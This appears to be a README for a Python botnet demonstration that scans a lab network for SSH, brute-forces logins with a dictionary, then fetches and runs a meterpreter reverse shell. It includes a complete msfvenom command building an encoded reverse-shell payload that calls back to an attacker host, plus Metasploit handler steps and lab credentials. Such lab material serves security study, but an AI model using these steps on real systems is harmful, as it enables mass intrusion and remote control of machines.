fresh_bot:
Demonstration of a simple botnet written in Python.
"scan_drop.py" file scans virtual network. If it finds a node with ssh
service it then performs a dictionary attack. If successful, script will
attmept to download a meterpreter reverse shell payload and execute it.
Multiprocessing allows for multiple targets to connect to our handler
at once.
Environment & Setup
1. Our Attack machine:Linux kali 4.16.0-kali2-amd64
2. Create payload:msfvenom --payload linux/x86/meterpreter_reverse_tcp LPORT=443 LHOST=192.168.203.1 -e shikata_ga_nai -f elf -a x86 -o evil_file
3. Create Web Server & host payload:192.168.203.1/evil_file
4. Create 4 target VMs. All with ssh servers on the same virtual network:ubuntu-16.04.5-desktop-amd64
192.168.203.150 user: fresh1 pass: fresh1192.168.203.151 user: fresh2 pass: fresh2
192.168.203.152 user: fresh3 pass: fresh3
192.168.203.153 user: fresh4 pass: fresh4
5. Run metasploit hander: msf5 > use exploit/multi/handler module
6. Attack/Exploit using dictionary attack.
7. Run scan_drop.py on target.